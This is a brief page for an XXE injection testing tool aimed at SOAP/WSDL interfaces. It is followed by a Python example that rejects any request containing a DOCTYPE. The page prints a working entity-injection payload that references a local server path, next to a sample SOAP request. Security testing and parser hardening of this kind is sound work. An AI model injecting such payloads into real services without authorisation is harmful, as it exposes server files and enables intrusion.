XXE Entity Injection Testing Tool
XXE Entity Injection
Interfaces such as a SOAP WSDL endpoint use XML, so we can customize both the parameters and the website address.
Usage: www.xxx.com
XXE entity injection parameter:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY % remote SYSTEM "/opt">%remote;]>
WSDL parameters:
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <getWeatherbyCityNamePro xmlns="http://WebXml.com.cn/">
      <theCityName>string</theCityName>
      <theUserID>string</theUserID>
    </getWeatherbyCityNamePro>
  </soap:Body>
</soap:Envelope>
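The server-side counterpart to this test, as an added example that is not part of the original page or the tool: a Python check built on the standard library's expat bindings that refuses any SOAP request carrying a DOCTYPE. The function names and verdict strings are assumptions, and the samples are constructed from the two XML strings shown on this page.

```python
import xml.parsers.expat


class DTDForbidden(ValueError):
    """The request body carries a DOCTYPE declaration."""


def soap_root_or_reject(body: bytes) -> str:
    """Parse a SOAP request with DTDs forbidden; return the root element name."""
    parser = xml.parsers.expat.ParserCreate()
    seen = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # expat reports the DOCTYPE before it handles the declarations in the
        # internal subset, so raising here stops the parse at that point.
        raise DTDForbidden(f"DOCTYPE {name!r} is not allowed in a SOAP request")

    def on_start(name, attrs):
        seen.append(name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.Parse(body, True)
    return seen[0]


def verdict(body: bytes) -> str:
    """Map the parse outcome to a short string suitable for a log line."""
    try:
        return "accepted:" + soap_root_or_reject(body)
    except DTDForbidden:
        return "rejected:doctype"
    except xml.parsers.expat.ExpatError:
        return "rejected:malformed"


# Constructed samples, assembled from the XML shown on this page.
PROLOG = b'<?xml version="1.0" encoding="UTF-8"?>'
DTD = b'<!DOCTYPE root [<!ENTITY % remote SYSTEM "/opt">%remote;]>'
ENVELOPE = (
    b'<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
    b'<soap:Body><getWeatherbyCityNamePro xmlns="http://WebXml.com.cn/">'
    b'<theCityName>string</theCityName><theUserID>string</theUserID>'
    b'</getWeatherbyCityNamePro></soap:Body></soap:Envelope>'
)

if __name__ == "__main__":
    print(verdict(PROLOG + ENVELOPE))        # plain SOAP request
    print(verdict(PROLOG + DTD + ENVELOPE))  # same request with the DTD prepended
```

A SOAP request has no legitimate need for a DTD, so rejecting every DOCTYPE outright is simpler to reason about than trying to allow some entities and block others.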